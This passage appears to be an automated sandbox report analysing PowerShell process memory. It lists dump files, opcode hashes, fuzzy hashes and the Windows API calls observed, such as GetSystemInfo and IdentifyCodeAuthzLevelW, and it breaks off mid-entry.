                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Cv
                                                                • API String ID: 0-2367982687
                                                                • Opcode ID: b849ff74c212e583cf3079fe90aab2c944294101e23c52133d0ace2f3c66ead3
                                                                • Instruction ID: 7acfd68c91bcfb612f8e23f15586b73dc94c584265b20f325798c96416e7e08a
                                                                • Opcode Fuzzy Hash: b849ff74c212e583cf3079fe90aab2c944294101e23c52133d0ace2f3c66ead3
                                                                • Instruction Fuzzy Hash: D2D18A39B042009FDB28EB75D855A7AB7A6EF8A214F59C52DD417DB390DB30EC02CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 02188ad18345c928038d0f44b2c7683d9d2431cd6f78ccdf58ca158bf887d480
                                                                • Instruction ID: 52e2ef6c9efa32a0e09b30e3ba88de811cefb67e66b42f03a1e9793d118fb85c
                                                                • Opcode Fuzzy Hash: 02188ad18345c928038d0f44b2c7683d9d2431cd6f78ccdf58ca158bf887d480
                                                                • Instruction Fuzzy Hash: CCA2C574A01219CFDB64DF69C988B9DBBF2BB49300F1485EAD909A7360DB359E81CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1e31cb33c8d1f36089488312ba6a7b5e1fd4ab1dda9b9fbbedd22a000c907b1
                                                                • Instruction ID: 4f925ad918a6a0359efa2879f40542a21cf317af5f2174e2599744b187816f0d
                                                                • Opcode Fuzzy Hash: f1e31cb33c8d1f36089488312ba6a7b5e1fd4ab1dda9b9fbbedd22a000c907b1
                                                                • Instruction Fuzzy Hash: F2328A78B002058FDB14EFB8C954A7EB7E6EF88650B18846DD5069B394DF34EC42CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5c6a42ecc7fad5566558ec5bf9991cd5f8eee12b60f618a2001299edc0285225
                                                                • Instruction ID: df62bb16e47b640efc32fbed706a522425ea19215ef182795fe8137ed6295729
                                                                • Opcode Fuzzy Hash: 5c6a42ecc7fad5566558ec5bf9991cd5f8eee12b60f618a2001299edc0285225
                                                                • Instruction Fuzzy Hash: 3AE1AD78B002048FDB14EFB4D954AAEB7B6EFC9310F19856DD806AB394DF349C428B56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49ed31b391fbc17ccf763b1e1743bd11f3ab870329915ac572e7c13a13439dc3
                                                                • Instruction ID: f63cc2f9824537352d28cf5bbf8eea9d59a32729fca3ec6c69f8c9f5f61b16fe
                                                                • Opcode Fuzzy Hash: 49ed31b391fbc17ccf763b1e1743bd11f3ab870329915ac572e7c13a13439dc3
                                                                • Instruction Fuzzy Hash: 5DE14C74E002188FDB64DF75C850BAEBBF2AF89304F1485AEC40AAB355DB359D858F85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92f056da32d8627ed6cbbd05866fd17eb2135b06e638562b0913308388b95d3f
                                                                • Instruction ID: 696326d1287e6dd08709f809bbd57bc41227cb3a2ed01fcaf617da0300bdf5a9
                                                                • Opcode Fuzzy Hash: 92f056da32d8627ed6cbbd05866fd17eb2135b06e638562b0913308388b95d3f
                                                                • Instruction Fuzzy Hash: 2FB1D5347007008FD764EF36885467FB6E7AFCA648B18882DC106DB394EF74AC0A8796
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94bb1db457ff1a85f30b7ed49033c0a234c3b6423e0a582fe740222e2fb52a2d
                                                                • Instruction ID: 98ef01385254099962972b234be98d96b43453c4fca3f8246dcb676a720a6c3b
                                                                • Opcode Fuzzy Hash: 94bb1db457ff1a85f30b7ed49033c0a234c3b6423e0a582fe740222e2fb52a2d
                                                                • Instruction Fuzzy Hash: 93819A34F012488FDB59CFA5C8507AEBBBAAF89304F28806DE8059F395EB74D945CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                 Execution Coverage: 8.2%
                                                                 Dynamic/Decrypted Code Coverage: 0%
                                                                 Signature Coverage: 12.8%
                                                                 Total number of Nodes: 109
                                                                 Total number of Limit Nodes: 7

                                                                 Graph

                                                                 [Rendered execution graph not reproduced; the API calls labelled on it are GetSystemInfo, AddConsoleAliasA, IdentifyCodeAuthzLevelW, ComputeAccessTokenFromCodeAuthzLevel, FindFirstFileNameTransactedW and ShowOwnedPopups.]

                                                                Executed Functions

                                                                 Control-flow Graph

                                                                 [Rendered control-flow graph not reproduced; it covers the function starting at c799de, and the only API call labelled on it is FindFirstFileNameTransactedW.]
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2af97fa5aa2918b5fea6fb07d094db69e1dff7fd2ff797c9aa9856900aabe9d6
                                                                • Instruction ID: e22b038804a7b7eabc2ec1b894269295dfaa9e7c8e4b2f4a7b8f87817b39cce0
                                                                • Opcode Fuzzy Hash: 2af97fa5aa2918b5fea6fb07d094db69e1dff7fd2ff797c9aa9856900aabe9d6
                                                                • Instruction Fuzzy Hash: 3A527E34B002088FDB14DFA5C994AAEBBB6FF88304F14C469E90A9B355DB39DE45CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                 Control-flow Graph

                                                                 [Rendered control-flow graph not reproduced; it covers the function starting at c79c6e, and the only API call labelled on it is FindFirstFileNameTransactedW.]
                                                                APIs
                                                                • FindFirstFileNameTransactedW.KERNEL32 ref: 00C79D7B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirstNameTransacted
                                                                • String ID:
                                                                • API String ID: 2802389721-0
                                                                • Opcode ID: b4c52807b5231238fbee79dc7c786001f75f8021689c73f16f307582ca7b7688
                                                                • Instruction ID: cff053cdaf369657692beea7a2dfdede6d15a81a79655393679d2f6e363d9ee0
                                                                • Opcode Fuzzy Hash: b4c52807b5231238fbee79dc7c786001f75f8021689c73f16f307582ca7b7688
                                                                • Instruction Fuzzy Hash: 5CE14E34B002089FEB18DBB5C954AAE77F6EF88304F108068E916DB395EB79DE45CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                 Control-flow Graph

                                                                 [Rendered control-flow graph not reproduced; it covers the function starting at 7a8deb8, and the only API call labelled on it is GetSystemInfo.]
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: 505a79669ec03d74e7dabcc81c954dc2ef460956900f24ec8659d733ad01d725
                                                                • Instruction ID: 8b8534e88b1f37fa281d52d0498bf416896538206464b12d877c35f7341eaeb3
                                                                • Opcode Fuzzy Hash: 505a79669ec03d74e7dabcc81c954dc2ef460956900f24ec8659d733ad01d725
                                                                • Instruction Fuzzy Hash: D511E0B5D002599BCB00CF9AD844BDEFBF4FB48314F14811AE828A3240C3746954CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                 Control-flow Graph

                                                                 [Rendered control-flow graph not reproduced; it covers the function starting at c042a9, and the only API call labelled on it is AddConsoleAliasA.]
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be1cff4855c9a1721c13e794054a52874c9da2e93a7be94b53977f62fc1fdc85
                                                                • Instruction ID: e10778be751acd30059d973c66381294ce84177b0e9b4f98432a0593ae1f7cf3
                                                                • Opcode Fuzzy Hash: be1cff4855c9a1721c13e794054a52874c9da2e93a7be94b53977f62fc1fdc85
                                                                • Instruction Fuzzy Hash: A0122D74A00218DFDB29DF54D854B9ABBF2FF48301F1585A9E909A73A1CB359E81CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                 Control-flow Graph

                                                                 [Rendered control-flow graph not reproduced; it covers the function starting at c043fe, and the only API call labelled on it is AddConsoleAliasA.]
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d985e8deeeb894624cedb6a34bed9e612967e4d4cd1b296f518c79de8ba35fbf
                                                                • Instruction ID: bbcbee08302ad9ca79528befd1e89e2445a19e9ac0a0a0d14ddd267019790fa0
                                                                • Opcode Fuzzy Hash: d985e8deeeb894624cedb6a34bed9e612967e4d4cd1b296f518c79de8ba35fbf
                                                                • Instruction Fuzzy Hash: B8912E74A00218DFCB19DF55C854B9AB7F2BF48305F158198EA099B391DB75EE81CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                 Control-flow Graph

                                                                 [Rendered control-flow graph not reproduced; it covers the function starting at c046c0, and the only API call labelled on it is AddConsoleAliasA.]
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5de0fda88d68eb0f6b9ea50a8b3705cec1b12b1d77ce09332136aab440894b00
                                                                • Instruction ID: 1ca8cd3b823e59765a3221843e96bbba236017e6af23241c87b8f882ae5c078a
                                                                • Opcode Fuzzy Hash: 5de0fda88d68eb0f6b9ea50a8b3705cec1b12b1d77ce09332136aab440894b00
                                                                • Instruction Fuzzy Hash: 47910C74A00218DFCB19DF54C894B9AB7F2BF88305F158599EA099B391CB75EE81CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                 Control-flow Graph

                                                                 [Rendered control-flow graph not reproduced; it covers the function starting at c04811, and the only API call labelled on it is AddConsoleAliasA.]
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AliasConsole
                                                                • String ID:
                                                                • API String ID: 2855943285-0
                                                                • Opcode ID: 9d877c5d53ea8d9b3c3da9d3699ed980099ed1c1938a0ae0e02708a558cfdfe5
                                                                • Instruction ID: aab1ca26bee9d0b1e307d1dd8ddab192fc8749c327dfa80bfa3c9b5ba6f7a07a
                                                                • Opcode Fuzzy Hash: 9d877c5d53ea8d9b3c3da9d3699ed980099ed1c1938a0ae0e02708a558cfdfe5
                                                                • Instruction Fuzzy Hash: B5512E74A106188FCB29DF14D894B9AB7F2BF48305F1581E8DA09A7391DB34EE81CF80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function spanning 7a810a4 through 7a882b0; calls IdentifyCodeAuthzLevelW in block 7a881df-7a8822d (graph image not recoverable; executed / not-executed legend and node listing dropped)
                                                                APIs
                                                                • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 07A8821A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AuthzCodeIdentifyLevel
                                                                • String ID:
                                                                • API String ID: 1431151113-0
                                                                • Opcode ID: 869ca20b1e7d6c25358940a05ffbbbda434b5a2846e97345430ad4654bb3d743
                                                                • Instruction ID: 7dfa5c28e5d5155f42cfa4fe2fe9e403f4b6d5e4bd9dd7ec58bbdfb3013a4f62
                                                                • Opcode Fuzzy Hash: 869ca20b1e7d6c25358940a05ffbbbda434b5a2846e97345430ad4654bb3d743
                                                                • Instruction Fuzzy Hash: F741F4B090026ADFEB64DF99C984BDEBBB4BB48304F5085EAD41DB7240DB745A84CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function spanning 7a880fc through 7a882b0; calls IdentifyCodeAuthzLevelW in block 7a881df-7a8822d (graph image not recoverable; executed / not-executed legend and node listing dropped)
                                                                APIs
                                                                • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 07A8821A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AuthzCodeIdentifyLevel
                                                                • String ID:
                                                                • API String ID: 1431151113-0
                                                                • Opcode ID: f677f1d7e59c7f6a419a1a390001f9107f094e398d754acc949a3f2521d7ac7b
                                                                • Instruction ID: fccf63f7f2a855725ec0ea846b02a50d924ea301fc07849514cfd8c892ab0abd
                                                                • Opcode Fuzzy Hash: f677f1d7e59c7f6a419a1a390001f9107f094e398d754acc949a3f2521d7ac7b
                                                                • Instruction Fuzzy Hash: F941F6B090026ADFEB24DF59C984BDEBBB4BB48304F5085EAD41DB7240DB745A88CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function spanning 7a8d068 through 7a8d124; calls ComputeAccessTokenFromCodeAuthzLevel in block 7a8d0b8-7a8d0f3 (graph image not recoverable; executed / not-executed legend and node listing dropped)
                                                                APIs
                                                                • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 07A8D0E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                • String ID:
                                                                • API String ID: 132034935-0
                                                                • Opcode ID: 0414c1c8c2c52e3374471c959938104beefde865428be9cda7835f894c310839
                                                                • Instruction ID: b8d7b092dc1f2af63a3779ba872eec1e59adac45f243b7e84e2a5c62d4893d84
                                                                • Opcode Fuzzy Hash: 0414c1c8c2c52e3374471c959938104beefde865428be9cda7835f894c310839
                                                                • Instruction Fuzzy Hash: 102135B5900249DFCB10CFAAD884BDEBBF4FF48324F14842AE528A7640C738A545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: function spanning 7a810b0 through 7a8d124; calls ComputeAccessTokenFromCodeAuthzLevel in block 7a810b0-7a8d0f3 (graph image not recoverable; executed / not-executed legend and node listing dropped)
                                                                APIs
                                                                • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 07A8D0E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                • String ID:
                                                                • API String ID: 132034935-0
                                                                • Opcode ID: cb9dd0156ae4fb5f79da8a18dda23736e7ec751a528f1d166b579600b51afd71
                                                                • Instruction ID: 87ff1c25499b135e6efca223b15b6754d34c0fe56b694882b0ed4b84e4e51098
                                                                • Opcode Fuzzy Hash: cb9dd0156ae4fb5f79da8a18dda23736e7ec751a528f1d166b579600b51afd71
                                                                • Instruction Fuzzy Hash: 0C2147B5900249DFCB10DF9AC884BDEBBF4FF48320F148429E929A7240D738A955CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: single block c7a5e8-c7a628 calling ShowOwnedPopups (graph image not recoverable; executed / not-executed legend dropped)
                                                                APIs
                                                                • ShowOwnedPopups.USER32(?,?,?,?,00000000,?,?,?), ref: 00C7A620
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID: OwnedPopupsShow
                                                                • String ID:
                                                                • API String ID: 1275925010-0
                                                                • Opcode ID: 75529c606176c4b0f75b60d4d54a8b4708c058b4bb1a3bb2652b55570f586eda
                                                                • Instruction ID: b447715f83d0f233ac1591d3422f6bc573241bd7ea57fd837fbf65c6eb7648c4
                                                                • Opcode Fuzzy Hash: 75529c606176c4b0f75b60d4d54a8b4708c058b4bb1a3bb2652b55570f586eda
                                                                • Instruction Fuzzy Hash: 19F0C976904149BF9F02CEA09C01CAB3FBAEB58340B1585A6B914C6122E2328A35BB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph: single block c7a5f8-c7a628 calling ShowOwnedPopups (graph image not recoverable; executed / not-executed legend dropped)
                                                                APIs
                                                                • ShowOwnedPopups.USER32(?,?,?,?,00000000,?,?,?), ref: 00C7A620
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID: OwnedPopupsShow
                                                                • String ID:
                                                                • API String ID: 1275925010-0
                                                                • Opcode ID: 4209189a6aaae0249e0feccff56d73a5df1160dedc45bbae11e54244448b2e6f
                                                                • Instruction ID: 7b8d1628002221249902ebd943c88a44899be2f1a1f515f26ddffe3107312023
                                                                • Opcode Fuzzy Hash: 4209189a6aaae0249e0feccff56d73a5df1160dedc45bbae11e54244448b2e6f
                                                                • Instruction Fuzzy Hash: 98E0927290010DFF9F01DEA19D01CAF7BBAEB48240B00C465BA0492121E6329A31BBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfff5877ef82b522bb8fc123c25a440fc5247f395ced1e7b85333a832c7087cc
                                                                • Instruction ID: 5e846297de58aa95522c54d09a09b2f478941b83d862ba30163fd8b30875f82b
                                                                • Opcode Fuzzy Hash: dfff5877ef82b522bb8fc123c25a440fc5247f395ced1e7b85333a832c7087cc
                                                                • Instruction Fuzzy Hash: 99F18270A0020DDFCB14DFA4C980AAEBBB6FF88304F348569D609AB355DB75AD45CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d95889f42aa20ee5825f8c4792d5b5b23bab8a9f6c11a2f9a8f2595f0ff8a33d
                                                                • Instruction ID: 188354a408b7805df92195ac7ff34202f542c15b77a2d2928b5f1727f159b072
                                                                • Opcode Fuzzy Hash: d95889f42aa20ee5825f8c4792d5b5b23bab8a9f6c11a2f9a8f2595f0ff8a33d
                                                                • Instruction Fuzzy Hash: 2EB1B2747002599FCB14DB68D890A6EBBB6FF89304F148569E5069B3A1DB30FC05CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 745a24594c9e7063e03c83cf1759e537fb83f5c292a45027e8c67d7d42c014dd
                                                                • Instruction ID: f5d237d092244d6d38588dfd9a27b025e8d8382d5c6faecdc1fa23efb0bb4c04
                                                                • Opcode Fuzzy Hash: 745a24594c9e7063e03c83cf1759e537fb83f5c292a45027e8c67d7d42c014dd
                                                                • Instruction Fuzzy Hash: 98D10834A04219CFDB24DF64CD94BADBBB2BF89304F2481A9D509AB395DB719D82CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b4c8e8e7cd85a96b1b679840933a74c2c6514457fd98baa6a4e6dd97039fb76
                                                                • Instruction ID: cdad5e7ead201ba38ebd84e93e95223bb84c4f07c35bd6590f4324dd7c9a1d1d
                                                                • Opcode Fuzzy Hash: 3b4c8e8e7cd85a96b1b679840933a74c2c6514457fd98baa6a4e6dd97039fb76
                                                                • Instruction Fuzzy Hash: 17B18235B002188FCB14EFA4D954AADBBF3FF89304F648968D906AB394DF359D058B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3cecd509563c96f5bd768ecc60fb0c0d51b1e2a41d1a674695a7f18bcc510ac7
                                                                • Instruction ID: 54930bd460173f0dc13f2eebaca61cb31c45dd44b74fcfee7f3a7177f9838f10
                                                                • Opcode Fuzzy Hash: 3cecd509563c96f5bd768ecc60fb0c0d51b1e2a41d1a674695a7f18bcc510ac7
                                                                • Instruction Fuzzy Hash: 408102797002184FCB149B74D85577A7AA3EFC9314F288479EA0ADB391CF399C0297A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92ea859e185d7b8257a146d89498a58e1b3e61e0de29a201860f306737312463
                                                                • Instruction ID: 4bf4c9a61fe38a82fc0480e52ced98a6f50af670bdfb0ab421187b64758b6a2d
                                                                • Opcode Fuzzy Hash: 92ea859e185d7b8257a146d89498a58e1b3e61e0de29a201860f306737312463
                                                                • Instruction Fuzzy Hash: 41516A34A042598FDB24DF64C950BADBBF2BF88304F2481A9D509EB391DB319D42CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 229e6d54e27978adbbe29c237737d0c02a337a8164129c0d4bdd49ddb0a60abe
                                                                • Instruction ID: d9caa66a15ad998d326279f3f4d37bd8869ede46c960ed6916cb919e686ddc7f
                                                                • Opcode Fuzzy Hash: 229e6d54e27978adbbe29c237737d0c02a337a8164129c0d4bdd49ddb0a60abe
                                                                • Instruction Fuzzy Hash: 3D419074A01218DFCB04EFA4E8949ADBBB2FFC9314F148569E905AB350DB35AD05CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 69297de58273cf600705512442e0f094e3efbcc0b929073f82621c8838828a84
                                                                • Instruction ID: d35d0cfa6825a98a2481bbf004cf1078cf2a5a573b366ea3d94810d5972bfe65
                                                                • Opcode Fuzzy Hash: 69297de58273cf600705512442e0f094e3efbcc0b929073f82621c8838828a84
                                                                • Instruction Fuzzy Hash: EF512774A002089FDB14DF94C985BAEBBF2EF88304F349468E509AB3A5DB75AC41CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f3d6016f2274708b9357109217d82bdaeb17bca4d096ea319acfc5618ea0823
                                                                • Instruction ID: b768e05626fd64262f2f1be14116b179b64ee1fe63a5d34b6ec19bf4ebbd7c80
                                                                • Opcode Fuzzy Hash: 3f3d6016f2274708b9357109217d82bdaeb17bca4d096ea319acfc5618ea0823
                                                                • Instruction Fuzzy Hash: E7318174A01224DFCB08EF68E4948ADB7B6FFC9315B508569E806AB350DF35AD06CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.429455256.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18e6ccad6260a5e27dff276ecbef4699748865f2ab273cafaefcd839ff4a2d2b
                                                                • Instruction ID: 71696529fae9fe5eca3a8f4c2901a05b9c95d160c44b51259495a72b6f4953ad
